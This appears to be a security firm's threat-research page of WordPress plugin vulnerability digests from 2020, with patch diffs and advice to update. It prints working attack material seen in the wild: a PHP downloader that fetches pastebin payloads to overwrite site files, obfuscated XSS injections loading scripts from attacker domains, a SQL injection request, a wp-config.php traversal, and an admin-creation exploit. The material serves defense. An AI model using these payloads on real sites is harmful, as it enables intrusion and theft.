Sucuri Labs

The home of our Security Engineering Group, including our Threat Research, Technical Security and Automation teams.

Vulnerable Plugins: June 2020 Update

This is a mid-month update to our regular Monthly Vulnerability Digest, which reveals a number of new patches for disclosed vulnerabilities.

 

PluginVulnerabilityPatched VersionInstalls
Elementor Page BuilderAuthenticated Stored XSS2.9.105000000
AdRotateAuthenticated SQL Injection5.8.440000
Brizy - Page BuilderImproper Access Controls1.0.12660000
CareerfyUnauthenticated XSS3.9.05000
SportsPressAuthenticated Stored XSS2.7.220000
JobSearchUnauthenticated XSS1.5.15000
NewspaperUnauthenticated XSS10.3.46000
Multi SchedulerRecord Deletion CSRF--20

 

Highlights

  • Cross-site scripting is the most common vulnerability in WordPress plugins
  • None of these plugins have been identified in massive attacks

Relevant Plugins

SportsPress

Sportspress fixed an authenticated stored cross-site scripting vulnerability in version 2.7.2. This vulnerability allows authenticated attackers to arbitrarily update the “sportspress_event_teams_delimiter” plugin option, allowing for the potential execution of malicious scripts every time the site is loaded.

Since this bug is really easy for attackers to exploit in malware campaigns, we’ve been following it closely but haven’t detected any massive abuses as an attack vector. We believe this is primarily due to the fact that the vulnerability exploit requires access to a compromised user within the vulnerable site.

 

Patch:

Index: sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
===================================================================
--- a/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
+++ b/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php         
         if ( isset( $_POST['sportspress_event_teams_delimiter'] ) )
-            update_option( 'sportspress_event_teams_delimiter', $_POST['sportspress_event_teams_delimiter'] );
+            update_option( 'sportspress_event_teams_delimiter', sanitize_text_field( $_POST['sportspress_event_teams_delimiter'] ) );
 }

 

AdRotate

Adrotate fixed an authenticated SQL Injection in version 5.8.4. We haven’t detected any massive automated attacks targeting this plugin.

Patch:

    if(isset($_GET['status'])) $status = esc_attr($_GET['status']);
     if(isset($_GET['view'])) $view = esc_attr($_GET['view']);
     if(isset($_GET['id'])) $id = esc_attr($_GET['id']);
     if(isset($_GET['file'])) $file = esc_attr($_GET['file']);
+
+    if(!is_numeric($status)) $status = 0;
+    if(!is_numeric($id)) $id = 0;

 

The majority of the public vulnerabilities in this mid-month update require the possession of a user account within the vulnerable site, which reduces the odds of any massive infections.

That being said, to mitigate risk from these recently patched vulnerabilities we strongly encourage all affected users to update their plugins as soon as possible.

Malicious Curl Downloader

If you want to easily download and save remote files, curl is an excellent command-line tool for Windows and Unix. It supports HTTP, HTTPS, and FTP protocols and allows for custom HTTP headers, which makes it a common feature in some of the malware we find on compromised sites.

For example, during a recent cleanup we found this malicious script using curl to download code from pastebin.com and save it into a local file on the website.

<?php 

chmod($_SERVER['DOCUMENT_ROOT']."/wp-load.php", 0644);
chmod($_SERVER['DOCUMENT_ROOT']."/index.php", 0644);
chmod($_SERVER['DOCUMENT_ROOT']."/.htaccess", 0644);
chmod($_SERVER['DOCUMENT_ROOT']."/wp-load.php", 0644);
chmod($_SERVER['DOCUMENT_ROOT']."/index.php", 0644);
chmod($_SERVER['DOCUMENT_ROOT']."/.htaccess", 0644);

function http_get($url){
    $im = curl_init($url);
    curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($im, CURLOPT_HEADER, 0);
    return curl_exec($im);
    curl_close($im);
}

$hector0 = $_SERVER['DOCUMENT_ROOT'] . "/.htaccess" ;
$hectortxt2 = http_get('hxxps://pastebin.com/raw/VgBTWCqv');
file_put_contents($hector0, $hectortxt2);

$hector777 = $_SERVER['DOCUMENT_ROOT'] . "/index.php" ;
$hectortxt777 = http_get('hxxps://pastebin.com/raw/ELF1BqnD');
$open777 = fopen($hector777, 'w');
fwrite($open777, $hectortxt777);
fclose($open777);

?>

The http_get function initiates curl and downloads the malicious content before file_put_contents is used to save the malicious content into the appropriate file. fwrite was also used for some reason, likely for compatibility purposes.

In this case, the malicious code is downloading additional backdoors and malware — but the pastebin.com file defined here can be easily modified to instruct the malware to download anything the attacker wants.

One of the best methods to prevent and detect the modification of your index.php files is to set up tighter file permissions that restrict write access and employ a file integrity monitoring tool to notify you of any changes. Or, simply use a website firewall to mitigate the compromise in the first place.

Vulnerabilities Digest: May 2020

Relevant Plugins and Vulnerabilities:

PluginVulnerabilityPatched VersionInstalls
WP Product ReviewUnauthenticated Stored XSS3.7.640000
Form Maker by 10WebAuthenticated SQL Injection---100000
Add-on SweetAlert Contact Form 7Authenticated XSS1.0.820
Paid Memberships ProAuthenticated SQL Injection2.3.390000
Visual ComposerAuthenticated XSS2780000
Team MembersAuthenticated XSS5.0.440000
Photo Gallery by 10WebUnauthenticated SQL Injection1.5.55300000
Login/Signup PopupAuthenticated XSS1.510000
Easy TestimonialsAuthenticated Stored XSS3.630000
WooCommerceUnescaped Metadata4.1.05000000
Page Builder by SiteOriginCSRF to XSS2.10.161000000
ChopsliderAuthenticated SQL Injection---200
Elementor ProAuthenticated File Upload2.9.4100000
LearnPressPrivilege Escalation3.2.6.980000
ElementorAuthenticated Stored XSS2.9.84000000
AvadaAuthenticated Stored XSS6.2.3500000
Ninja FormsCSRF to Stored XSS3.4.24.21000000
Advanced Order Export For WooAuthenticated XSS3.1.490000
Quick Page/Post redirectAuthenticated Settings Update---100000
Ultimate Addons for ElementorRegistration Bypass1.24.2100000
WTI Like PostAuthenticated XSS---10000
WP-Advanced-SearchAuthenticated SQL Injection3.3.71000
Gmedia Photo GalleryAuthenticated XSS1.18.510000

Highlights for May 2020

  • Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
  • Attackers have added three plugins and a series of new malicious IPs to their arsenal in an ongoing massive malware campaign targeting WordPress websites with known vulnerabilities.

Details for these highlights can be found under the components listed below.

WP Product Review

Two weeks ago, we reported an Unauthenticated Stored Cross Site Scripting in WP Product Review caused by a lack of protection in a rest route definition and improper handling of user input.

Only a few days after the disclosure of this vulnerability, attackers began to scan for vulnerable sites:

181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"

139.198.16.241 - - [18/May/2020:17:15:36 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1" 

185.162.127.248 - - [17/May/2020:03:38:15 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 

213.159.210.170 - - [17/May/2020:01:35:04 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 

Patch (version 3.7.6):

Index: wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
===================================================================
--- a/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
+++ b/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
@@ -97,4 +97,7 @@
                 'methods'  => 'POST',
                 'callback' => array( $this, 'update_review_callback' ),
+                'permission_callback' => function () {
+                    return current_user_can( 'edit_posts' );
+                },
                 'args'     => array(
                     'id' => array(

---

Index: wp-product-review/trunk/includes/functions.php
===================================================================
--- a/wp-product-review/trunk/includes/functions.php
+++ b/wp-product-review/trunk/includes/functions.php
@@ -229,5 +229,5 @@
         }
         ?>
-        <a title="<?php echo $review_object->get_name(); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
+        <a title="<?php echo esc_attr( $review_object->get_name() ); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
             <img
                 src="<?php echo esc_attr( $src ); ?>"

Elementor

Earlier this month, the plugin Elementor Pro fixed an arbitrary file upload vulnerability caused by an unprotected Ajax hook. It wasn’t long before attackers started exploiting this vulnerability.

Our team identified these malicious IPs trying to detect plugin installations for both Elementor Pro and Ultimate Addons for Elementor:

69.164.207.140 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1" 

45.79.193.100 - - [08/May/2020:16:49:13 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1" 

62.210.172.66 - - [10/May/2020:02:33:29 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1" 

62.210.84.69 - - [13/May/2020:08:13:57 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

62.210.172.66 - - [13/May/2020:08:21:05 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

[...]

Photo Gallery by 10Web

An unauthenticated SQL Injection was fixed this month in the plugin Photo Gallery.

Patch (version 1.5.55):

Index: photo-gallery/trunk/frontend/models/model.php
===================================================================
--- a/photo-gallery/trunk/frontend/models/model.php
+++ b/photo-gallery/trunk/frontend/models/model.php
@@ -197,32 +197,32 @@

   public function get_alb_gals_row( $bwg, $id, $albums_per_page, $sort_by, $order_by, $pagination_type = 0, $from = '' ) {
-    if ( $albums_per_page < 0 ) {
+    if ( $albums_per_page < 0 ) {
       $albums_per_page = 0;
     }
     global $wpdb;
-    $order_by = 'ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span><span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span>$from<span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span><span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by;
-    if( $sort_by == 'random' || $sort_by == 'RAND()' ) {
-      $order_by = 'ORDER BY RAND()';
-    }
-    $search_where = '';
-    $search_value = trim( WDWLibrary::get('bwg_search_' . $bwg) );
-    if ( !empty($search_value) ) {
-      $search_keys = explode(' ', $search_value);
+    $order_by = 'ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span> $from <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by;
+    if ( $sort_by == 'random' || $sort_by == 'RAND()' ) {
+      $order_by = 'ORDER BY RAND()';
+    }
+    $search_where = '';
+    $search_value = trim( WDWLibrary::get( 'bwg_search_' . $bwg ) );
+    if ( !empty( $search_value ) ) {
+      $search_keys = explode( ' ', $search_value );
       $alt_search = '(';
       $description_search = '(';

Payload Used by Attackers:

185.162.127.248 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23+%25DFGDFG%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2F%2A%2A%2Fas%2F%2A%2A%2Fdummy_3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23FGDFGDFG%29%29%23&gallery_type=album_compact_preview&type_0=album -- 2020-05-17

Plugin & Theme Payloads Added to Ongoing Campaign

Malicious Domains & Detected IPs

Our team saw the following new malicious domains injected into an ongoing campaign exploiting known WordPress vulnerabilities this month:

css[.]digestcolect[.]com
cls[.]balantfromsun[.]com
count[.]trackstatisticsss[.]com

The following IPs have also been associated with this campaign:

79.133.202.70
154.43.128.23
185.162.127.248
51.83.70.152
213.159.210.170
139.162.28.41
139.99.169.192
185.217.0.224
84.238.108.177
62.210.180.8
[...]

 

Exploit Attempts Seen in the Wild

Our team identified attacks against the following vulnerable plugins and themes.

Bold Page Builder (From Last Year)
139.162.28.41 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C54%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-05-12
WP Quick Booking Manager (from 4 years ago)
139.162.28.41 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Fcss.digestcolect.com%2Fstm%3Fv%3Dl6.0.0%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [12/May/2020:04:52:19 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 
Duplicator Download
62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1" 

Many other plugins are still under attack and public exploits already exist for all of the components listed above. Please check our previous lab notes for more information about this ongoing WordPress Malware campaign.

To mitigate threat, we strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

Unauthenticated Stored Cross Site Scripting in WP Product...

 

Exploitation Level: Very Easy / Remote

DREAD Score: 7.4

Vulnerability: Persistent Cross-site Scripting

Patched Version: 3.7.6

 

During a routine research audit for our Sucuri Firewall, we discovered an Unauthenticated Persistent Cross-Site Scripting (XSS) affecting 40,000+ users of the WP Product Review plugin.

Current State of the Vulnerability

Though this security bug was fixed in the 3.7.6 release, older versions can be exploited by an attacker without any account in the vulnerable site. We are not aware of any exploit attempts currently using this vulnerability.

Disclosure / Response Timeline:

  • May 13, 2020: Initial contact.
  • May 14, 2020: Patch is live.

Technical Details

All user input data is sanitized but the WordPress function used can be bypassed when the parameter is set inside an HTML attribute. A successful attack results in malicious scripts being injected in all the site’s products.

unknown shell packer

Update as Soon as Possible

Unauthenticated attacks are very serious because they can be automated, making it easy for hackers to mount successful, widespread attacks against vulnerable websites. The number of active installs, the ease of exploitation, and the effects of a successful attack are what makes this vulnerability particularly dangerous.

To protect against this vulnerability, we strongly encourage WP Product Review users to update their plugin to version 3.7.6 as soon as possible. Users that are unable to update immediately can leverage the Sucuri Firewall or equivalent technology to virtually patch the vulnerability.

B374k Web Shell Packer

PHP web shells are a type of backdoor which, when left on compromised websites, allow attackers to maintain unauthorized access after initial compromise.

To further evade detection, attackers may also choose to keep a packer script on a compromised website instead of the actual PHP web shell. They can then use this script to generate the PHP web shell on an as-needed basis.

One of the more common PHP web shells is b374k.php. It’s popular with bad actors because it offers a lot of features including a file manager, database connect, various text conversions, and email via PHP.

Let’s take a look at how attackers can load b374k.php with a packing script, seen below.

unknown shell packer

This unknown shell packer offers a few different options to the attacker:

  • Output - Defines the filename of the PHP web shell to be created
  • Password - Sets a password used to limit access to the PHP web shell
  • Module - Optional features that can be enabled: convert, database, info, mail, network, processes
  • Theme - Optional color theme
  • Strip Comments and Whitespaces - Removes unneeded code comments and whitespaces
  • Base64 Encode - encodes the PHP web shell’s code with base64
  • Compress - Compresses the PHP code with various PHP functions like gzdeflate, gzencode, gzcompress. This feature requires the code to have already been base64 encoded.

Attackers can also run the packer by submitting the parameters through PHP CLI, if available.

cli for b374k packer

Regardless of whether the attacker opts for the PHP CLI or the browser GUI, the result is a generated PHP shell with the chosen filename — in this case unknown.php — which is dropped in the current directory.

interface for b374k packer

These types of malicious scripts can be found planted anywhere within a website’s environment, so the best way to mitigate threat is to prevent unauthorized access to your website in the first place. Practice strong password security principles and use a firewall to prevent a password from brute force.

Vulnerabilities Digest: April 2020

Relevant Plugins and Vulnerabilities:

PluginVulnerabilityPatched VersionInstalls
Widget Settings Importer/ExporterStored XSSClosed40000
AccordionStored/Reflected XSS2.2.930000
Support Ticket System By PhoeniixxReflected XSSClosed2000
Gutenberg BlocksAuthenticated Settings Change1.14.8200000
WP Lead Plus XStored XSS0.9970000
OneToneStored XSSClosed20000
WP Advanced SearchSQL Injection3.3.61000
Easy Forms for MailchimpAuthenticated XSS6.6.3100000
CM Pop-Up bannersStored XSS1.4.1110000
Duplicate Page and PostSQL Injection2.5.850000
WP post page closeSQL InjectionClosed----

Highlights for April 2020

  • Developers are still falling short when sanitizing user input, leading to the exploitation of vulnerable third-party components.
  • Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
  • Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
  • Access bypass bugs continue to be the most critical vulnerability.
  • We saw a spike in attempts to exploit old Magento vulnerabilities

Details for these highlights can be found under the components listed below.

WP-Advanced-Search

Developers fixed an unauthenticated SQL Injection in WP-Advanced-Search which was caused by an improper handling of user input data.

Public PoC:

GET /wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_autosuggest&f=[malicious payload] 

Patch (version 3.6):

Developers removed the “autocompletion-PHP5.5.php” file and added restrictions to multiple SQL queries.

--- a/wp-advanced-search.old/class.inc/autocompletion/autocompletion-PHP5.5.php
+++ /dev/null
@@ -1,58 +0,0 @@
-<?php
-if(isset($_GET['q']) && !empty($_GET['q'])) {
-       $query = htmlspecialchars(stripslashes($_GET['q']));
-
-       // Récupération à la volée des informations transmises par le script d'autocomplétion
-       $table   = htmlspecialchars($_GET['t']);
-       $field   = htmlspecialchars($_GET['f']);
-       $type    = htmlspecialchars($_GET['type']);
-       $encode  = htmlspecialchars($_GET['e']);
[...]
-    // Requête de recherche dans l'index inversé (base de mots clés auto-générés)
-    // $requeteSQL = "SELECT DISTINCT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC LIMIT 0 , ".$limitS."";
-    $requeteSQL = "SELECT ".$field." FROM ".$table." WHERE ".$field." LIKE '".$arg.$link->real_escape_string($query)."%' ORDER BY ".$field." ASC, idindex DESC";

Support Ticket System By Phoeniixx

The plugin Support Ticket System By Phoeniixx was closed due to lack of maintenance, but existing users are still impacted by a reflected Cross Site Scripting vulnerability.

Public PoC:

GET  site.com/?view_id=[malicious payload] 

Vulnerable Code:

<script>

var newurl      = '<?php echo admin_url('admin-ajax.php') ;?>';                       
var get_val = '<?php echo (!empty($_GET['view_id']))?$_GET['view_id']:""; ?>';

</script>

Plugin & Theme Payloads Added to Ongoing Campaign

The Popup builder plugin allows site owners to easily create promotion popups. This past month, versions < 3.64 were affected by an unauthenticated stored XSS and attackers are still using it to infect thousands of sites.

Malicious domains injected this month

slow[.]destinyfernandi[.]com
ws[.]stivenfernando[.]com
stat[.]trackstatisticsss[.]com

Exploit Attempts Seen in the Wild

This past month, our team identified attacks against the following vulnerable plugins and themes.

OneTone theme (closed)
164.132.194.160 -- POST -- /wp-admin/admin-ajax.php -- action=onetone_options_import&options=%7B%22header_social_icons%22%3A%5B%5D%2C%22page_title_bar_background1%22%3A%7B%22background-color%22%3A%22%22%2C%22background[...]2C%22top_bar_info_content%22%3A%22%22%2C%22copyright%22%3A%22%3Cscript%3Eeval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,57,44,57,55,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125))%3B%3C%5C%2Fscript%3E%22%7D -- 2020-04-27
Popup Builder
185.212.128.162 -- POST -- /wp-admin/admin-ajax.php -- action=sgpb_autosave&allPopupData[...]%27on%27+%2B+eventName%2C+fn%29%3B%7D&allPopupData%5B92%5D%5Bname%5D=sgpb-WillOpen&allPopupData%5B92%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.currentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+document.getElementsByTagName%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3Blist.insertBefore%28s%2C+list.childNodes%5B0%5D%29%3B%7D&allPopupData%5B93%5D%5Bname%5D=sgpb-DidOpen&allPopupData%5B93%5D%5Bvalue%5D=+&allPopupData%5B94%5D%5Bname%5D=sgpb-ShouldClose&allPopupData%5B94%5D%5Bvalue%5D=var+u+%3D+String.fromCharCode%28104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C119%2C115%2C46%2C115%2C116%2C105%2C118%2C101%2C110%2C102%2C101%2C114%2C110%2C97%2C110%2C100%2C111%2C46%2C99%2C111%2C109%2C47%2C115%2C116%2C109%2C63%2C118%2C61%2C46%2C49%2C119%2C115%2C51%2C46%2C49%2C46%2C56%2C46%2C49%2C46%2C49%29%3Bvar+d%3Ddocument%3Bvar+s%3Dd.createElement%28String.fromCharCode%28115%2C99%2C114%2C105%2C112%2C116%29%29%3B+s.type%3DString.fromCharCode%28116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%29%3B+var+pl+%3D+u%3B+s.src%3Dpl%3B+if+%28document.currentScript%29+%7B+document.currentScript.parentNode.insertBefore%28s%2C+document.currentScript%29%3B%7D+else+%7Bd.getElementsByTagName%28String.fromCharCode%28104%2C101%2C97%2C100%29%29%5B0%5D.appendChild%28s%29%3Bvar+list+%3D+d[...]sgpb-css-editor&allPopupData%5B97%5D%5Bvalue%5D= 

Many other plugins are still under attack. Please check our previous lab notes for more information.

Detected IPs
185.212.128.162
164.132.194.160
188.166.16.17
66.228.44.215
173.249.6.22
54.39.10.60
5.196.207.195
84.238.108.177
109.96.171.178
92.119.185.126

ThemeREX Addons

Back in February, we shared information about a critical vulnerability in ThemeREX Addons that was disclosed to the public and later on massively exploited by attackers.

Here is the full working exploit that attackers are using to compromise vulnerable sites.

195.154.177.210 -- post -- /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login=ndvtzaifnz&user_pass=6Wlh6SA0RT -- - -- 2020-04-04
Detected IPs
195.154.177.210
5.135.143.224
84.238.108.177
109.96.171.178
92.119.185.126
82.77.172.62
82.78.189.130

Old Magento Versions Still Exploited

Unpatched Magento sites will be always targeted by attackers and that’s why we encourage users to implement all security patches in a timely manner. Multiple vulnerabilities were fixed two years ago and attackers are still taking advantage of them.

We've listed some of the exploits attackers are using to compromise vulnerable sites below.

Magento Made Cache - Object Injection

